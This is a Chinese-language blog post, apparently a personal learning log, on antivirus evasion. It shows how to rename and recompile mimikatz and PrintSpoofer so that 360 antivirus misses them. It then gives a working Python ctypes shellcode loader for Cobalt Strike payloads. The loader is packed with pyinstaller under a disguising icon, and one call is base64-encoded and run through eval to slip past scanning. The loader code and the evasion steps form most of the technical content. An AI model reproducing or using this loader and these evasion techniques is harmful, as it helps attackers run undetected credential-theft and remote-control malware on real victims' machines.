<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>初识免杀 | 墨水彩笔</title><meta name="author" content="墨水彩笔"><meta name="copyright" content="墨水彩笔"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="mimikatzMimikatz源码下载 1https:&#x2F;&#x2F;github.com&#x2F;gentilkiwi&#x2F;mimikatz  配置环境首先确定自己的配置是C++配置 在工具选项中选择“导入和导出设置”-&gt;重置所有设置 然后进入项目，选择mimikatz右键属性  设置好后对于mimikatz右键进行生成 注意我们默认的话可能是32位程序 可以利用两种方法">
<meta property="og:type" content="article">
<meta property="og:title" content="初识免杀">
<meta property="og:url" content="http://example.com/2023/01/04/%E5%88%9D%E8%AF%86%E5%85%8D%E6%9D%80/index.html">
<meta property="og:site_name" content="墨水彩笔">
<meta property="og:description" content="mimikatzMimikatz源码下载 1https:&#x2F;&#x2F;github.com&#x2F;gentilkiwi&#x2F;mimikatz  配置环境首先确定自己的配置是C++配置 在工具选项中选择“导入和导出设置”-&gt;重置所有设置 然后进入项目，选择mimikatz右键属性  设置好后对于mimikatz右键进行生成 注意我们默认的话可能是32位程序 可以利用两种方法">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg">
<meta property="article:published_time" content="2023-01-04T12:36:45.000Z">
<meta property="article:modified_time" content="2023-02-18T09:17:14.953Z">
<meta property="article:author" content="墨水彩笔">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2023/01/04/%E5%88%9D%E8%AF%86%E5%85%8D%E6%9D%80/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.2.0',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  ClickShowText: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2023-02-18 17:17:14'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(function () {
  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }

  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }
})()</script><meta name="generator" content="Hexo 5.2.0"></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/null" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">Articles</div><div class="length_num">76</div></a></div></div></div><hr/></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#mimikatz"><span class="toc-number">1.</span> <span class="toc-text">mimikatz</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E7%8E%AF%E5%A2%83"><span class="toc-number">1.1.</span> <span class="toc-text">配置环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%94%9F%E6%88%90%E4%BC%98%E5%8C%96"><span class="toc-number">1.2.</span> <span class="toc-text">生成优化</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9B%BF%E6%8D%A2%E5%85%B3%E9%94%AE%E5%AD%97"><span class="toc-number">1.2.1.</span> <span class="toc-text">替换关键字</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A0%E9%99%A4%E6%B3%A8%E9%87%8A%E4%BF%A1%E6%81%AF"><span class="toc-number">1.2.2.</span> <span class="toc-text">删除注释信息</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3"><span class="toc-number">1.3.</span> <span class="toc-text">问题解决</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#PrintSpoofer-master"><span class="toc-number">2.</span> <span class="toc-text">PrintSpoofer-master</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BC%96%E8%AF%91%E7%94%9F%E6%88%90"><span class="toc-number">2.1.</span> <span class="toc-text">编译生成</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%9B%E8%A1%8C%E5%85%8D%E6%9D%80%E4%BF%AE%E6%94%B9"><span class="toc-number">2.2.</span> <span class="toc-text">进行免杀修改</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%AE%E6%94%B9%E5%85%B3%E9%94%AE%E8%AF%8D"><span class="toc-number">2.2.1.</span> <span class="toc-text">修改关键词</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A0%E9%99%A4%E6%B3%A8%E9%87%8A%E4%BF%A1%E6%81%AF-1"><span class="toc-number">2.2.2.</span> <span class="toc-text">删除注释信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B7%BB%E5%8A%A0icon%E5%9B%BE%E6%A0%87"><span class="toc-number">2.2.3.</span> <span class="toc-text">添加icon图标</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Python3"><span class="toc-number">3.</span> <span class="toc-text">Python3</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%8D%E6%AC%A1%E5%8A%A0%E5%BC%BA%E5%85%8D%E6%9D%80"><span class="toc-number">3.1.</span> <span class="toc-text">再次加强免杀</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9D%80%E6%AF%92%E7%BD%91%E7%AB%99"><span class="toc-number">4.</span> <span class="toc-text">杀毒网站</span></a></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">墨水彩笔</a></span><span id="menus"><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">初识免杀</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2023-01-04T12:36:45.000Z" title="Created 2023-01-04 20:36:45">2023-01-04</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2023-02-18T09:17:14.953Z" title="Updated 2023-02-18 17:17:14">2023-02-18</time></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post View:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h1 id="mimikatz"><a href="#mimikatz" class="headerlink" title="mimikatz"></a>mimikatz</h1><p>Mimikatz源码下载</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;github.com&#x2F;gentilkiwi&#x2F;mimikatz</span><br></pre></td></tr></table></figure>

<h2 id="配置环境"><a href="#配置环境" class="headerlink" title="配置环境"></a>配置环境</h2><p>首先确定自己的配置是C++配置</p>
<p>在工具选项中选择“导入和导出设置”-&gt;重置所有设置</p>
<p>然后进入项目，选择mimikatz右键属性</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105141134984.png?raw=true" alt="image-20230105141134984.png"></p>
<p>设置好后对于mimikatz右键进行生成</p>
<p>注意我们默认的话可能是32位程序</p>
<p>可以利用两种方法进行修改</p>
<p>方法一</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105141621638.png?raw=true" alt="image-20230105141621638.png"></p>
<p>方法二</p>
<p>右键解决方案进行配置属性</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105141638531.png?raw=true" alt="image-20230105141638531.png"></p>
<p>生成之后是可以通过360云查杀的，但如果点击运行就会报警</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105142242859.png?raw=true" alt="image-20230105142242859.png"></p>
<h2 id="生成优化"><a href="#生成优化" class="headerlink" title="生成优化"></a>生成优化</h2><h3 id="替换关键字"><a href="#替换关键字" class="headerlink" title="替换关键字"></a>替换关键字</h3><p>右键编辑-&gt;查找和替换-&gt;在文件中替换（快捷键ctrl+shift+h）</p>
<p>进行替换将mimikatz替换成moomteams,记得查找范围是整个方案</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105142840129.png?raw=true" alt="image-20230105142840129.png"></p>
<p>接下来将整个项目文件进行重命名</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105143843380.png?raw=true" alt="image-20230105143843380.png"></p>
<h3 id="删除注释信息"><a href="#删除注释信息" class="headerlink" title="删除注释信息"></a>删除注释信息</h3><p>在.c和.h文件的头部存在注释信息进行删除</p>
<p>对于rc文件进行修改</p>
<h2 id="问题解决"><a href="#问题解决" class="headerlink" title="问题解决"></a>问题解决</h2><p>mimidrv显示已卸载</p>
<p>无法找到 v141_xp 的生成工具</p>
<p>对于mimikatz文件右键属性，选择平台工具</p>
<h1 id="PrintSpoofer-master"><a href="#PrintSpoofer-master" class="headerlink" title="PrintSpoofer-master"></a>PrintSpoofer-master</h1><p>PrintSpoofer-master下载地址</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;github.com&#x2F;whojeff&#x2F;PrintSpoofer</span><br></pre></td></tr></table></figure>

<h2 id="编译生成"><a href="#编译生成" class="headerlink" title="编译生成"></a>编译生成</h2><p>发现可以生成一个exe文件进行查杀</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105161611607.png?raw=true" alt="image-20230105161611607.png"></p>
<p>查杀通过，但如果双击使用的话显示缺少dll</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105161644990.png?raw=true" alt="image-20230105161644990.png"></p>
<p>缺少dll是因为我们编译的时候默认选择的是Debug我们在VS studio中选择release重新编译</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105161822361.png?raw=true" alt="image-20230105161822361.png"></p>
<p>但编译完成后再放入win7直接报警</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105161909945.png?raw=true" alt="image-20230105161909945.png"></p>
<h2 id="进行免杀修改"><a href="#进行免杀修改" class="headerlink" title="进行免杀修改"></a>进行免杀修改</h2><h3 id="修改关键词"><a href="#修改关键词" class="headerlink" title="修改关键词"></a>修改关键词</h3><p>将PrintSpoofer修改为mscb</p>
<p>并将cpp和h后缀文件修改文件名为mscb，并将项目名称进行修改</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105170005063.png?raw=true" alt="image-20230105170005063.png"></p>
<h3 id="删除注释信息-1"><a href="#删除注释信息-1" class="headerlink" title="删除注释信息"></a>删除注释信息</h3><p>PrintUsage函数，只留下一点点内容</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105165744785.png?raw=true" alt="image-20230105165744785.png"></p>
<p>再次编译，发现之前打开的文件夹错了，要选择Release里面的文件</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105170217953.png?raw=true" alt="image-20230105170217953.png"></p>
<p>这次生成的文件虽然一下子不被警报，但过不了360查杀</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105170321304.png?raw=true" alt="image-20230105170321304.png"></p>
<h3 id="添加icon图标"><a href="#添加icon图标" class="headerlink" title="添加icon图标"></a>添加icon图标</h3><p>右键项目-&gt;添加-&gt;资源，选择icon</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105170516514.png?raw=true" alt="image-20230105170516514.png"></p>
<h1 id="Python3"><a href="#Python3" class="headerlink" title="Python3"></a>Python3</h1><p>利用语句安装</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip install pyinstaller</span><br></pre></td></tr></table></figure>

<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105172514775.png?raw=true" alt="image-20230105172514775.png"></p>
<p>写好payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">import ctypes</span><br><span class="line"></span><br><span class="line">#shellcode 加载</span><br><span class="line">def shellCodeLoad(shellcode):</span><br><span class="line">    ctypes.windll.kernel32.VirtualAlloc.restype &#x3D; ctypes.c_uint64</span><br><span class="line">    ptr &#x3D; ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))</span><br><span class="line">    buf &#x3D; (ctypes.c_char * len(shellcode)).from_buffer(shellcode)</span><br><span class="line">    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))</span><br><span class="line">    handle &#x3D; ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))</span><br><span class="line">    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))</span><br><span class="line">if __name__ &#x3D;&#x3D; &quot;__main__&quot;:  </span><br><span class="line">    shellCodeLoad(bytearray(b&#39;shellcode&#39;))</span><br></pre></td></tr></table></figure>

<p>这里面的shellcode通过cs来完成，cs界面点击攻击-&gt;生成后门-&gt;payload generator</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105194415636.png?raw=true" alt="image-20230105194415636.png"></p>
<p>打开生成的py文件，填入上述代码的shellcode内</p>
<p>打包编译命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pyinstaller -F py3.py --noconsole</span><br></pre></td></tr></table></figure>

<p>换个icon</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pyinstaller -F py3.py --noconsole -i PC.png -n python3</span><br></pre></td></tr></table></figure>

<p>换个图标之后发现居然过了360免杀，但刚刚准备用命令行执行就被查杀了</p>
<p>就过了一次免杀</p>
<h2 id="再次加强免杀"><a href="#再次加强免杀" class="headerlink" title="再次加强免杀"></a>再次加强免杀</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))</span><br></pre></td></tr></table></figure>

<p>对上述内容进行base64编码</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105200019700.png?raw=true" alt="image-20230105200019700.png"></p>
<p>利用编码处理再通过eval动态执行代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eval(base64.b64decode(&quot;Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ&#x3D;&#x3D;&quot;))</span><br></pre></td></tr></table></figure>

<p>再次进行查杀</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/%E5%85%8D%E6%9D%80/image-20230105200334113.png?raw=true" alt="image-20230105200334113.png"></p>
<p>发现过了，尝试上线</p>
<h1 id="杀毒网站"><a href="#杀毒网站" class="headerlink" title="杀毒网站"></a>杀毒网站</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;www.virustotal.com&#x2F;gui&#x2F;</span><br><span class="line"></span><br><span class="line">https:&#x2F;&#x2F;www.virscan.org&#x2F;language&#x2F;zh-cn&#x2F;</span><br></pre></td></tr></table></figure>

</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">墨水彩笔</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2023/01/04/%E5%88%9D%E8%AF%86%E5%85%8D%E6%9D%80/">http://example.com/2023/01/04/%E5%88%9D%E8%AF%86%E5%85%8D%E6%9D%80/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2023/01/28/%E5%85%8D%E6%9D%80%E5%9F%BA%E7%A1%80/"><img class="prev-cover" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">免杀基础</div></div></a></div><div class="next-post pull-right"><a href="/2022/12/18/WEB-BUU%E7%AC%AC%E4%B8%89%E9%A1%B5/"><img class="next-cover" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">WEB-BUU第三页</div></div></a></div></nav></article></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2023 By 墨水彩笔</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><i class="fas fa-arrow-up"></i></button></div></section><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></div></body></html>